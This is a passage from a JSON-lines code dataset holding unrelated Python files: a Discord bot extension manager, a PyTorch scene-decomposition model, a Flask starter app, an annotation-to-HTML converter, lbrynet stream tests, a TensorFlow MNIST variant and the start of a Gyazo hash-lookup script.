delete_after=5.0)\n except ModuleNotFoundError as err:\n await ctx.send_error(f'{err.__class__.__name__}: {err}', delete_after=5.0)\n else:\n await ctx.send_success(f'{module} loaded successfully', delete_after=5.0)\n\n @commands.command()\n @commands.has_permissions(administrator=True)\n async def unload(self, ctx, *, module):\n \"\"\"Unloads a module.\"\"\"\n await ctx.message.delete(delay=5.0)\n try:\n self.bot.unload_extension(module)\n except commands.ExtensionError as err:\n await ctx.send_error(f'{err.__class__.__name__}: {err}', delete_after=5.0)\n except ModuleNotFoundError as err:\n await ctx.send_error(f'{err.__class__.__name__}: {err}', delete_after=5.0)\n else:\n await ctx.send_success(f'{module} unloaded successfully', delete_after=5.0)\n\n @commands.group(name='reload', invoke_without_command=True)\n @commands.has_permissions(administrator=True)\n async def _reload(self, ctx, *, module=None):\n \"\"\"Reloads a module.\"\"\"\n\n if module is None:\n if self.last_reloaded is not None:\n await self._reload(ctx, module=self.last_reloaded)\n return\n\n await ctx.message.delete(delay=5.0)\n try:\n self.bot.reload_extension(module)\n self.last_reloaded = module\n except commands.ExtensionError as err:\n await ctx.send_error(f'{err.__class__.__name__}: {err}', delete_after=5.0)\n except ModuleNotFoundError as err:\n await ctx.send_error(f'{err.__class__.__name__}: {err}', delete_after=5.0)\n else:\n await ctx.send_success(f'{module} reloaded successfully', delete_after=5.0)\n\n @_reload.command(name='all', hidden=True)\n @commands.has_permissions(administrator=True)\n async def _reload_all(self, ctx):\n \"\"\"Reloads all modules\"\"\"\n output = \"\"\n\n for module in list(self.bot.extensions.keys()):\n try:\n self.bot.reload_extension(module)\n except commands.ExtensionError as err:\n output += f'{module} - {err.__class__.__name__}: {err}\\n'\n except ModuleNotFoundError as err:\n await ctx.send_error(f'{err.__class__.__name__}: {err}', delete_after=5.0)\n else:\n output += f'{module} - reloaded successfully\\n'\n\n await ctx.message.delete(delay=5.0)\n await ctx.send_embed(output, delete_after=5.0)\n\n @commands.command()\n async def cogs(self, ctx):\n await ctx.send_embed(\" **»** \" + \"\\n **»** \".join(self.bot.cogs))\n\n @commands.command(aliases=[\"extentions\"])\n async def extensions(self, ctx):\n await ctx.send_embed(\" **»** \" + \"\\n **»** \".join(self.bot.extensions))\n\n\ndef setup(bot):\n bot.add_cog(CogManager(bot))\n","sub_path":"bot/cogs/cog_manager.py","file_name":"cog_manager.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"613531643","text":"import math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional\nfrom network import InitializerBack, InitializerFull, InitializerCrop, UpdaterBack, UpdaterFull, UpdaterCrop, \\\n EncDecBack, EncDecFull, EncDecCrop\nimport pdb\n\nclass Model(nn.Module):\n\n def __init__(self, args):\n super(Model, self).__init__()\n # Hyperparameters\n self.register_buffer('prior_where_mu', torch.tensor(args.prior_where_mu)[None, None])\n self.register_buffer('prior_where_invvar', 1 / torch.tensor(args.prior_where_std)[None, None].pow(2))\n self.register_buffer('prior_where_logvar', -self.prior_where_invvar.log())\n self.num_steps = args.num_steps\n self.max_objects = args.max_objects\n self.image_full_height = args.image_full_height\n self.image_full_width = args.image_full_width\n self.image_crop_height = args.image_crop_height\n self.image_crop_width = args.image_crop_width\n self.gaussian_invvar = 1 / pow(args.gaussian_std, 2)\n self.gaussian_const = math.log(2 * math.pi / self.gaussian_invvar)\n self.prior_pres_alpha = args.prior_pres_alpha\n self.prior_pres_log_alpha = math.log(self.prior_pres_alpha)\n # Neural networks\n self.init_back = InitializerBack(args)\n self.init_full = InitializerFull(args)\n self.init_crop = InitializerCrop(args)\n self.upd_back = UpdaterBack(args)\n self.upd_full = UpdaterFull(args)\n self.upd_crop = UpdaterCrop(args)\n self.enc_dec_back = EncDecBack(args)\n self.enc_dec_full = EncDecFull(args)\n self.enc_dec_crop = EncDecCrop(args)\n\n def compute_grid(self, scl, trs, batch_size):\n theta_crop = torch.stack([\n torch.stack([scl[:, 0], torch.zeros_like(scl[:, 0]), trs[:, 0]], dim=1),\n torch.stack([torch.zeros_like(scl[:, 1]), scl[:, 1], trs[:, 1]], dim=1),\n ], dim=1)\n theta_full = torch.stack([\n torch.stack([1 / scl[:, 0], torch.zeros_like(scl[:, 0]), -trs[:, 0] / scl[:, 0]], dim=1),\n torch.stack([torch.zeros_like(scl[:, 1]), 1 / scl[:, 1], -trs[:, 1] / scl[:, 1]], dim=1),\n ], dim=1)\n grid_crop = nn.functional.affine_grid(\n theta_crop, [batch_size, 1, self.image_crop_height, self.image_crop_width])\n grid_full = nn.functional.affine_grid(\n theta_full, [batch_size, 1, self.image_full_height, self.image_full_width])\n return grid_crop, grid_full\n\n @staticmethod\n def compute_gamma(shp, zeta):\n x = shp * zeta[..., None, None]\n padded_ones = x.new_ones(1, *x.shape[1:])\n return torch.cat([x, padded_ones]) * torch.cat([padded_ones, 1 - x]).cumprod(0)\n\n def compute_init_full_inputs(self, images, result_back, result_obj):\n gamma = self.compute_gamma(result_obj['shp'], result_obj['zeta'])\n recon = (gamma * torch.cat([result_obj['apc'], result_back['back'][None]])).sum(0)\n mask = 1 - gamma[-1]\n return torch.cat([images, recon, mask], dim=1).detach()\n\n def compute_upd_back_inputs(self, images, result_back, result_obj):\n inputs_exclude = self.compute_init_full_inputs(images, result_back, result_obj)\n return torch.cat([inputs_exclude, result_back['back']], dim=1).detach()\n\n def compute_upd_full_inputs(self, images, result_back, result_obj, idx):\n gamma_above = self.compute_gamma(result_obj['shp'][:idx], result_obj['zeta'][:idx])\n gamma_below = self.compute_gamma(result_obj['shp'][idx + 1:], result_obj['zeta'][idx + 1:])\n gamma_cur = self.compute_gamma(result_obj['shp'][idx:idx + 1], result_obj['zeta'][idx:idx + 1])\n recon_above = (gamma_above * torch.cat([result_obj['apc'][:idx], result_back['back'][None]])).sum(0)\n recon_below = (gamma_below * torch.cat([result_obj['apc'][idx + 1:], result_back['back'][None]])).sum(0)\n mask_above = 1 - gamma_above[-1]\n recon_cur = (gamma_cur * torch.cat([result_obj['apc'][idx:idx + 1], result_back['back'][None]])).sum(0)\n mask_cur = 1 - gamma_cur[-1]\n return torch.cat([images, recon_above, recon_below, mask_above, recon_cur, mask_cur], dim=1).detach()\n\n def compute_upd_crop_inputs(self, images, result_back, result_obj, grid_crop, idx):\n inputs_full = self.compute_upd_full_inputs(images, result_back, result_obj, idx)\n return nn.functional.grid_sample(inputs_full, grid_crop)\n\n @staticmethod\n def initialize_storage(result_obj, states_dict, update_dict):\n for key, val in result_obj.items():\n if val is None:\n result_obj[key] = update_dict[key][None]\n else:\n result_obj[key] = torch.cat([val, update_dict[key][None]])\n for key in states_dict:\n states_dict[key].append(update_dict[key])\n return\n\n @staticmethod\n def update_storage(result_obj, states_dict, update_dict, idx):\n for key, val in result_obj.items():\n if states_dict is not None or key in update_dict:\n result_obj[key] = torch.cat([val[:idx], update_dict[key][None], val[idx + 1:]])\n if states_dict is not None:\n for key, val in states_dict.items():\n states_dict[key] = val[:idx] + [update_dict[key]] + val[idx + 1:]\n return\n\n def compute_indices(self, images, result_obj, eps=1e-5):\n diffs_sq = (result_obj['apc'] - images[None]).pow(2).sum(-3, keepdim=True).detach()\n masks = result_obj['shp'].clone().detach()\n coefs = masks.new_ones(masks.shape[:-2])\n indices_list = []\n for _ in range(diffs_sq.shape[0]):\n vis_diffs_sq = (masks * diffs_sq).view(*masks.shape[:-2], -1).sum(-1)\n vis_areas = masks.view(*masks.shape[:-2], -1).sum(-1)\n vis_max_vals = masks.view(*masks.shape[:-2], -1).max(-1).values\n scores = coefs * vis_max_vals * result_obj['zeta'] * \\\n torch.exp(-0.5 * self.gaussian_invvar * vis_diffs_sq / (vis_areas + eps))\n indices = torch.argmax(scores, dim=0)\n indices_list.append(indices)\n mask = torch.gather(masks, 0, indices[None, ..., None, None].expand(-1, -1, *masks.shape[2:]))\n masks *= 1 - mask\n coefs.scatter_(0, indices[None], -1)\n indices = torch.stack(indices_list)\n return indices\n\n @staticmethod\n def adjust_order_sub(x, indices):\n if x.dim() == 3:\n x = torch.gather(x, 0, indices.expand(-1, -1, *x.shape[2:]))\n elif x.dim() == 5:\n x = torch.gather(x, 0, indices[..., None, None].expand(-1, -1, *x.shape[2:]))\n else:\n raise AssertionError\n return x\n\n def adjust_order(self, images, result_obj, states_dict):\n indices = self.compute_indices(images, result_obj)\n for key, val in result_obj.items():\n result_obj[key] = self.adjust_order_sub(val, indices)\n for key, val in states_dict.items():\n states_0 = self.adjust_order_sub(torch.stack([n[0] for n in val]), indices)\n states_1 = self.adjust_order_sub(torch.stack([n[1] for n in val]), indices)\n states_dict[key] = [(n_0, n_1) for n_0, n_1 in zip(states_0, states_1)]\n return\n\n @staticmethod\n def transform_result(result):\n for key, val in result.items():\n if key not in ['back', 'back_likelihood', 'back_latent']:\n result[key] = val.transpose(0, 1)\n return result\n\n def forward(self, images):\n ###################\n # Initializations #\n ###################\n # Background\n states_back = self.init_back(images)\n result_back = self.enc_dec_back(states_back[0])\n # Objects\n result_obj = {\n 'apc': images.new_empty(0, *images.shape), #转换后物体的外观\n 'shp': images.new_zeros(0, images.shape[0], 1, *images.shape[2:]), #转换后物体的形状\n 'zeta': images.new_zeros(0, images.shape[0], 1),\n # 'apc_likelihood': images.new_zeros(0, images.shape[0], 1),\n }\n #‘scl' 表示物体大小的隐变量,'trs'表示物体位置的隐变量,他们均由'where_mu'和'where_logvar'得到\n #'shp_mu'和'shp_logvar'表示物体形状隐变量,解码得到物体的标准化形状shp_crop\n #'apc_latent'为物体外观隐变量,解码后得到物体的标准化外观apc_crop\n #'tau1'和 'tau2'为Beta分布的两个参数,zeta表示物体是否存在的隐变量分布参数\n result_obj.update({\n key: None for key in\n [\n 'tau1', 'tau2', 'logits_zeta', 'where_mu', 'where_logvar', 'shp_mu', 'shp_logvar',\n 'apc_latent', 'apc_likelihood','scl', 'trs', 'apc_crop', 'shp_crop',\n ]\n }) \n\n states_dict = {key: [] for key in ['states_full', 'states_crop1', 'states_crop2']}\n states_main = None\n for _ in range(self.max_objects):\n # Full\n inputs_full = self.compute_init_full_inputs(images, result_back, result_obj) # cat: images, recon, mask, batch_size*7*48*48\n states_full, states_main = self.init_full(inputs_full, states_main)\n result_full = self.enc_dec_full(states_full[0]) #'scl','trs','tau1','tau2','zeta','logits_zeta','where_mu','where_logvar'\n grid_crop, grid_full = self.compute_grid(result_full['scl'], result_full['trs'], images.shape[0]) #计算双线性采样的二维网格\n # Crop\n inputs_crop = nn.functional.grid_sample(inputs_full, grid_crop) # batch_size*7*24*24\n states_crop1,states_crop2 = self.init_crop(inputs_crop)\n # print('states_crop1[0]:',states_crop1[0].shape,'states_crop2[0]:',states_crop2[0].shape)\n # print('states_crop1[0]:',states_crop1,'states_crop2[0]:',states_crop2)\n result_crop = self.enc_dec_crop(states_crop1[0], states_crop2[0], grid_full)#'apc','shp','apc_crop','apc_crop_diff','shp_crop','what_mu','what_logvar'\n # Update storage\n update_dict = {**result_full, **result_crop, 'states_full': states_full, 'states_crop1': states_crop1,'states_crop2': states_crop2} \n self.initialize_storage(result_obj, states_dict, update_dict)\n # Adjust order\n self.adjust_order(images, result_obj, states_dict)\n # Result\n result = {**result_back, **result_obj}\n results = [result]\n ###############\n # Refinements #\n ###############\n for _ in range(self.num_steps):\n # Background\n inputs_back = self.compute_upd_back_inputs(images, result_back, result_obj) # batch_size*10*48*48\n states_back = self.upd_back(inputs_back, states_back)\n result_back = self.enc_dec_back(states_back[0]) # back:batch_size*3*48*48, back_mu:# batch_size*32\n # Objects\n for idx_obj in range(self.max_objects):\n # Full\n inputs_full = self.compute_upd_full_inputs(images, result_back, result_obj, idx_obj) # batch_size*7*48*48\n states_full = self.upd_full(inputs_full, states_dict['states_full'][idx_obj])\n result_full = self.enc_dec_full(states_full[0]) \n grid_crop, grid_full = self.compute_grid(result_full['scl'], result_full['trs'], images.shape[0]) # batch_size*24*24*2, batch_size*48*48*2\n apc = nn.functional.grid_sample(result_obj['apc_crop'][idx_obj], grid_full) # batch_size*3*48*48\n shp = nn.functional.grid_sample(result_obj['shp_crop'][idx_obj], grid_full) # batch_size*1*48*48\n update_dict = {'apc': apc, 'shp': shp, 'zeta': result_full['zeta']}\n self.update_storage(result_obj, None, update_dict, idx_obj)\n # Crop\n inputs_crop = self.compute_upd_crop_inputs(images, result_back, result_obj, grid_crop, idx_obj)\n states_crop1,states_crop2 = self.upd_crop(inputs_crop, states_dict['states_crop1'][idx_obj], states_dict['states_crop2'][idx_obj])\n result_crop = self.enc_dec_crop(states_crop1[0],states_crop2[0], grid_full)\n # Update storage\n update_dict = {**result_full, **result_crop, 'states_full': states_full, 'states_crop1': states_crop1, 'states_crop2': states_crop2}\n self.update_storage(result_obj, states_dict, update_dict, idx_obj)\n # Adjust order\n self.adjust_order(images, result_obj, states_dict)\n # Result\n result = {**result_back, **result_obj}\n results.append(result)\n results = [self.transform_result(n) for n in results]\n return results\n\n def compute_loss_recon(self, images, result, ratio):\n apc_n_back = torch.cat([result['apc'], result['back'][None]])\n gamma = self.compute_gamma(result['shp'], result['zeta'])\n part_diff = (images - (gamma * apc_n_back).sum(0)).pow(2)\n part_elbo = (gamma * (images[None] - apc_n_back).pow(2)).sum(0)\n part_opt = ratio * part_diff + (1 - ratio) * part_elbo\n loss = 0.5 * (self.gaussian_const + self.gaussian_invvar * (part_opt - part_opt.detach() + part_elbo.detach()))\n return loss.sum()\n\n @staticmethod\n def compute_kld_normal(mu, logvar, prior_mu, prior_logvar, prior_invvar):\n loss = 0.5 * (prior_logvar - logvar + prior_invvar * ((mu - prior_mu).pow(2) + logvar.exp()) - 1)\n return loss.sum()\n\n def compute_kld_pres(self, result):\n tau1 = result['tau1']\n tau2 = result['tau2']\n zeta = result['zeta']\n logits_zeta = result['logits_zeta']\n psi1 = torch.digamma(tau1)\n psi2 = torch.digamma(tau2)\n psi12 = torch.digamma(tau1 + tau2)\n # Beta\n loss_beta_1 = torch.lgamma(tau1 + tau2) - torch.lgamma(tau1) - torch.lgamma(tau2) - self.prior_pres_log_alpha\n loss_beta_2 = (tau1 - self.prior_pres_alpha) * psi1\n loss_beta_3 = (tau2 - 1) * psi2\n loss_beta_4 = -(tau1 + tau2 - self.prior_pres_alpha - 1) * psi12\n loss_beta = loss_beta_1 + loss_beta_2 + loss_beta_3 + loss_beta_4\n # Bernoulli\n log_zeta = nn.functional.logsigmoid(logits_zeta)\n log_one_minus_zeta = log_zeta - logits_zeta\n psi1_le_sum = psi1.cumsum(0)\n psi12_le_sum = psi12.cumsum(0)\n kappa1 = psi1_le_sum - psi12_le_sum\n psi1_lt_sum = torch.cat([psi1_le_sum.new_zeros(1, *psi1_le_sum.shape[1:]), psi1_le_sum[:-1]])\n logits_coef = psi2 + psi1_lt_sum - psi12_le_sum\n kappa2_list = []\n for idx in range(logits_coef.shape[0]):\n coef = torch.softmax(logits_coef[:idx + 1], dim=0)\n log_coef = nn.functional.log_softmax(logits_coef[:idx + 1], dim=0)\n coef_le_sum = coef.cumsum(0)\n coef_lt_sum = torch.cat([coef_le_sum.new_zeros(1, *coef_le_sum.shape[1:]), coef_le_sum[:-1]])\n part1 = (coef * psi2[:idx + 1]).sum(0)\n part2 = ((1 - coef_le_sum[:-1]) * psi1[:idx]).sum(0)\n part3 = -((1 - coef_lt_sum) * psi12[:idx + 1]).sum(0)\n part4 = -(coef * log_coef).sum(0)\n kappa2_list.append(part1 + part2 + part3 + part4)\n kappa2 = torch.stack(kappa2_list)\n loss_bernoulli = zeta * (log_zeta - kappa1) + (1 - zeta) * (log_one_minus_zeta - kappa2)\n return loss_beta.sum() + loss_bernoulli.sum()\n\n def compute_loss_back_prior(self, images, back):\n back_prior = images.view(*images.shape[:-2], -1).median(-1).values[..., None, None]\n loss = 0.5 * self.gaussian_invvar * (back - back_prior).pow(2).sum()\n return loss - loss.detach()\n\n def compute_loss_diff(self, x):\n loss = 0.5 * self.gaussian_invvar * x.pow(2).sum()\n return loss - loss.detach()\n\n def compute_batch_loss(self, images, result, coef_dict):\n loss_recon = self.compute_loss_recon(images, result, coef_dict['recon'])\n loss_kld_pres = self.compute_kld_pres(result)\n loss_kld_where = self.compute_kld_normal(result['where_mu'], result['where_logvar'], self.prior_where_mu,\n self.prior_where_logvar, self.prior_where_invvar)\n loss_kld_shp = self.compute_kld_normal(result['shp_mu'], result['shp_logvar'], 0, 0, 1)\n loss_apc_likelihood = result['apc_likelihood']\n loss_back_prior = coef_dict['back_prior'] * self.compute_loss_back_prior(images, result['back'])\n loss_back_likelihood = result['back_likelihood']\n loss = loss_recon + loss_kld_pres + loss_kld_where + loss_kld_shp + \\\n loss_back_prior - loss_apc_likelihood - loss_back_likelihood \n return loss\n\n def compute_log_likelihood(self, images, result, segre, recon_scene, eps=1e-10):\n diff_mixture = torch.cat([result['apc'], result['back'][None]]) - images[None]\n raw_ll_mixture = -0.5 * (self.gaussian_const + self.gaussian_invvar * diff_mixture.pow(2)).sum(-3, keepdim=True)\n ll_mixture = torch.logsumexp(segre.clamp(min=eps).log() + raw_ll_mixture, dim=0)\n ll_mixture = ll_mixture.view(ll_mixture.shape[0], -1).sum(-1)\n diff_single = recon_scene - images\n ll_single = -0.5 * (self.gaussian_const + self.gaussian_invvar * diff_single.pow(2))\n ll_single = ll_single.view(ll_single.shape[0], -1).sum(-1)\n return ll_mixture, ll_single\n\n\ndef get_model(args, path=None):\n model = Model(args)\n if path is not None:\n load_dict = torch.load(path)\n model_dict = model.state_dict()\n for key in model_dict:\n if key in load_dict and model_dict[key].shape == load_dict[key].shape:\n model_dict[key] = load_dict[key]\n else:\n print('\"{}\" not loaded'.format(key))\n model.load_state_dict(model_dict)\n return nn.DataParallel(model)\n","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":17865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"189112468","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 11 13:21:17 2020\n\n@author: BarisAlhan\n\"\"\"\n\nimport os\nfrom flask import Flask\nfrom . import db\n\ndef create_app(test_config = None):\n \n app = Flask(__name__, instance_relative_config=True)\n \n \n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n \n \n app.config.from_mapping(\n SECRET_KEY='tursu',\n DATABASE=os.path.join(app.instance_path, 'flaskr.sqlite'),\n )\n \n \n if test_config is None:\n app.config.from_pyfile('config.py', silent=True)\n else:\n app.config.from_mapping(test_config)\n \n \n @app.route('/')\n def hello():\n return 'Welcome to Tursu!'\n \n \n db.init_app(app)\n \n return app","sub_path":"practice_app/backend/flaskr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"492459017","text":"__author__ = 'charlesztt'\n\nimport os\nimport xml.etree.cElementTree as ET\nimport xml.dom.minidom\n\ndef get_sentence(event_token_id, token_list):\n first_token_id=event_token_id.split(\",\")[0]\n # print first_token_id\n start_flag=0\n for one_token in token_list:\n if first_token_id == one_token[0]:\n break\n start_flag+=1\n for i in range(start_flag,len(token_list)):\n if \"<\" in token_list[i][1]:\n break\n end_place=i\n for i in range(start_flag,0,-1):\n if \">\" in token_list[i][1]:\n break\n start_place=i+1\n sent_list=list()\n for i in range(start_place,end_place):\n sent_list.append(token_list[i][1])\n return \" \".join(sent_list)\n\ndef get_trigger(event_token_id, token_list):\n start_token_id=event_token_id.split(\",\")[0]\n end_token_id=event_token_id.split(\",\")[-1]\n start_flag=0\n for one_token in token_list:\n if start_token_id == one_token[0]:\n break\n start_flag+=1\n end_flag=0\n for one_token in token_list:\n if end_token_id == one_token[0]:\n break\n end_flag+=1\n trigger_list=list()\n for i in range(start_flag,end_flag+1):\n trigger_list.append(token_list[i][1])\n return \" \".join(trigger_list)\n\nf=open(\"./data/filelist.tab\")\n\ncandi_list=list()\n\nfor one_line in f:\n one_line=one_line.replace(\"\\r\",\"\").replace(\"\\n\",\"\")\n candi_list.append(one_line)\n\nf.close()\n\nfor one_candi in candi_list:\n event_list=list()\n f_sent=open(os.path.join(\"./data/nugget_train\",one_candi+\".txt.tab\"))\n f_sent.readline()\n token_list=list()\n for one_line in f_sent:\n one_line=one_line.replace(\"\\r\",\"\").replace(\"\\n\",\"\")\n token_list.append(one_line.split(\"\\t\")[0:2])\n f_sent.close()\n\n f_annotation=open(os.path.join(\"./data/nugget_train\",one_candi+\".ann.tab\"))\n for one_line in f_annotation:\n one_line=one_line.replace(\"\\r\",\"\").replace(\"\\n\",\"\")\n event_id=\"-\".join(one_line.split(\"\\t\")[1:3])\n event_token_id=one_line.split(\"\\t\")[3]\n event_type=one_line.split(\"\\t\")[5]\n event_sentence=get_sentence(event_token_id,token_list)\n event_trigger=get_trigger(event_token_id,token_list)\n event_list.append([event_id,event_type,event_trigger,event_sentence])\n f_annotation.close()\n\n f_source=open(os.path.join(\"./data/nugget_train\",one_candi+\".tkn.txt\"))\n empty_text=\"\"\n for one_line in f_source:\n if \"<\" in one_line and \">\" in one_line:\n if 'DOC' not in one_line:\n one_line=one_line.replace(\" \",\"\")\n else:\n if \"id\" not in one_line:\n one_line=one_line.replace(\" \",\"\")\n empty_text+=one_line\n f_source.close()\n tree=ET.fromstring(empty_text)\n notags = ET.tostring(tree, encoding='utf8', method='text')\n\n f=open(one_candi+\".html\",'w')\n f.write('
    '+'\\n')\n f.write(notags.replace(\"\\n\",\"
    \")+\"
    \\n
    \\n\")\n for one_event in event_list:\n f.write(\"ID: %s
    \\n\"%(one_event[0]))\n f.write(\"Type: %s
    \\n\"%(one_event[1]))\n f.write(\"Anchor: %s
    \\n\"%(one_event[2]))\n f.write(\"Extent: %s
    \\n\"%(one_event[3]))\n f.write(\"
    \\n\")\n f.write(\"
    \")\n f.close()","sub_path":"python/basic_stat/readable_creator.py","file_name":"readable_creator.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"507425564","text":"import os\nimport shutil\nimport tempfile\n\nfrom hashlib import md5\nfrom twisted.trial.unittest import TestCase\nfrom twisted.internet import defer, threads\n\nfrom lbrynet import conf\nfrom lbrynet.file_manager.EncryptedFileManager import EncryptedFileManager\nfrom lbrynet.core.Session import Session\nfrom lbrynet.core.StreamDescriptor import StreamDescriptorIdentifier\nfrom lbrynet.file_manager.EncryptedFileCreator import create_lbry_file\nfrom lbrynet.lbry_file.client.EncryptedFileOptions import add_lbry_file_to_sd_identifier\nfrom lbrynet.core.StreamDescriptor import get_sd_info\nfrom lbrynet.core.PeerManager import PeerManager\nfrom lbrynet.core.RateLimiter import DummyRateLimiter\n\nfrom lbrynet.tests import mocks\n\n\nFakeNode = mocks.Node\nFakeWallet = mocks.Wallet\nFakePeerFinder = mocks.PeerFinder\nFakeAnnouncer = mocks.Announcer\nGenFile = mocks.GenFile\ntest_create_stream_sd_file = mocks.create_stream_sd_file\nDummyBlobAvailabilityTracker = mocks.BlobAvailabilityTracker\n\n\nclass TestStreamify(TestCase):\n maxDiff = 5000\n def setUp(self):\n mocks.mock_conf_settings(self)\n self.session = None\n self.lbry_file_manager = None\n self.is_generous = True\n self.db_dir = tempfile.mkdtemp()\n self.blob_dir = os.path.join(self.db_dir, \"blobfiles\")\n os.mkdir(self.blob_dir)\n\n @defer.inlineCallbacks\n def tearDown(self):\n lbry_files = self.lbry_file_manager.lbry_files\n for lbry_file in lbry_files:\n yield self.lbry_file_manager.delete_lbry_file(lbry_file)\n if self.lbry_file_manager is not None:\n yield self.lbry_file_manager.stop()\n if self.session is not None:\n yield self.session.shut_down()\n yield self.session.storage.stop()\n yield threads.deferToThread(shutil.rmtree, self.db_dir)\n if os.path.exists(\"test_file\"):\n os.remove(\"test_file\")\n\n def test_create_stream(self):\n wallet = FakeWallet()\n peer_manager = PeerManager()\n peer_finder = FakePeerFinder(5553, peer_manager, 2)\n hash_announcer = FakeAnnouncer()\n rate_limiter = DummyRateLimiter()\n sd_identifier = StreamDescriptorIdentifier()\n\n self.session = Session(\n conf.ADJUSTABLE_SETTINGS['data_rate'][1], db_dir=self.db_dir, node_id=\"abcd\",\n peer_finder=peer_finder, hash_announcer=hash_announcer,\n blob_dir=self.blob_dir, peer_port=5553,\n use_upnp=False, rate_limiter=rate_limiter, wallet=wallet,\n blob_tracker_class=DummyBlobAvailabilityTracker,\n is_generous=self.is_generous, external_ip=\"127.0.0.1\", dht_node_class=mocks.Node\n )\n\n self.lbry_file_manager = EncryptedFileManager(self.session, sd_identifier)\n\n d = self.session.setup()\n d.addCallback(lambda _: add_lbry_file_to_sd_identifier(sd_identifier))\n d.addCallback(lambda _: self.lbry_file_manager.setup())\n\n def verify_equal(sd_info):\n self.assertEqual(sd_info, test_create_stream_sd_file)\n\n def verify_stream_descriptor_file(stream_hash):\n d = get_sd_info(self.session.storage, stream_hash, True)\n d.addCallback(verify_equal)\n return d\n\n def iv_generator():\n iv = 0\n while 1:\n iv += 1\n yield \"%016d\" % iv\n\n def create_stream():\n test_file = GenFile(5209343, b''.join([chr(i + 3) for i in xrange(0, 64, 6)]))\n d = create_lbry_file(self.session, self.lbry_file_manager, \"test_file\", test_file,\n key=\"0123456701234567\", iv_generator=iv_generator())\n d.addCallback(lambda lbry_file: lbry_file.stream_hash)\n return d\n\n d.addCallback(lambda _: create_stream())\n d.addCallback(verify_stream_descriptor_file)\n return d\n\n def test_create_and_combine_stream(self):\n wallet = FakeWallet()\n peer_manager = PeerManager()\n peer_finder = FakePeerFinder(5553, peer_manager, 2)\n hash_announcer = FakeAnnouncer()\n rate_limiter = DummyRateLimiter()\n sd_identifier = StreamDescriptorIdentifier()\n\n self.session = Session(\n conf.ADJUSTABLE_SETTINGS['data_rate'][1], db_dir=self.db_dir, node_id=\"abcd\",\n peer_finder=peer_finder, hash_announcer=hash_announcer,\n blob_dir=self.blob_dir, peer_port=5553, dht_node_class=mocks.Node,\n use_upnp=False, rate_limiter=rate_limiter, wallet=wallet,\n blob_tracker_class=DummyBlobAvailabilityTracker, external_ip=\"127.0.0.1\"\n )\n\n self.lbry_file_manager = EncryptedFileManager(self.session, sd_identifier)\n\n @defer.inlineCallbacks\n def create_stream():\n test_file = GenFile(53209343, b''.join([chr(i + 5) for i in xrange(0, 64, 6)]))\n lbry_file = yield create_lbry_file(self.session, self.lbry_file_manager, \"test_file\", test_file)\n sd_hash = yield self.session.storage.get_sd_blob_hash_for_stream(lbry_file.stream_hash)\n self.assertTrue(lbry_file.sd_hash, sd_hash)\n yield lbry_file.start()\n f = open('test_file')\n hashsum = md5()\n hashsum.update(f.read())\n self.assertEqual(hashsum.hexdigest(), \"68959747edc73df45e45db6379dd7b3b\")\n\n d = self.session.setup()\n d.addCallback(lambda _: add_lbry_file_to_sd_identifier(sd_identifier))\n d.addCallback(lambda _: self.lbry_file_manager.setup())\n d.addCallback(lambda _: create_stream())\n return d\n","sub_path":"lbrynet/tests/functional/test_streamify.py","file_name":"test_streamify.py","file_ext":"py","file_size_in_byte":5561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"581208241","text":"\"\"\"\nExample code written for https://www.meetup.com/Big-Data-Developers-in-Madrid/\n\nWillem Hendriks, willem.hendriks@nl.ibm.com\n\nDeep learning + Data Science, 31 Jan 2017\n\"\"\"\n\n# Modified example of MNIST tensorflow classification.\n#\n# Original content licence:\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# \n\nimport tensorflow as tf\n\n# Change the data, from MNIST to images of programmers\nfrom DataFeederPython import DataFeederPython\n\n# Create the model\nx = tf.placeholder(tf.float32, [None, 784])\nW = tf.Variable(tf.zeros([784, 10]))\nb = tf.Variable(tf.zeros([10]))\ny = tf.nn.softmax(tf.matmul(x, W) + b)\n\n# Define loss and optimizer\ny_ = tf.placeholder(tf.float32, [None, 10])\n\n# The raw formulation of cross-entropy,\n#\n# tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(tf.nn.softmax(y)),\n# reduction_indices=[1]))\n#\n# can be numerically unstable.\n#\n# So here we use tf.nn.softmax_cross_entropy_with_logits on the raw\n# outputs of 'y', and then average across the batch.\ncross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y))\ntrain_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)\n\nsess = tf.InteractiveSession()\ntf.global_variables_initializer().run()\n# Train\n\nfor _ in range(DataFeederPython.number_of_samples * 10):\n\tbatch_xs, batch_ys = DataFeederPython.next_batch(5)\n\tsess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})\n\ntest = DataFeederPython.get_test()\n\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\nprint(sess.run(accuracy, feed_dict={x: test[0], y_: test[1]}))\n","sub_path":"modified_mnist_example.py","file_name":"modified_mnist_example.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"591492298","text":"import requests,sys,hashlib,argparse,os\ndef gyazoMD5Exists(md5_hash):return requests.get(\"http://gyazo.com/%s\"%(md5_hash)).status_code==200\ndef printExists(h):print(\"%s EXISTS\"%h if gyazoMD5Exists(h) else \"%s DOES NOT EXIST\"%h)\ndef getMD5(path,buffer_size=1024*1024*32):\n\twith open(path,'rb')as 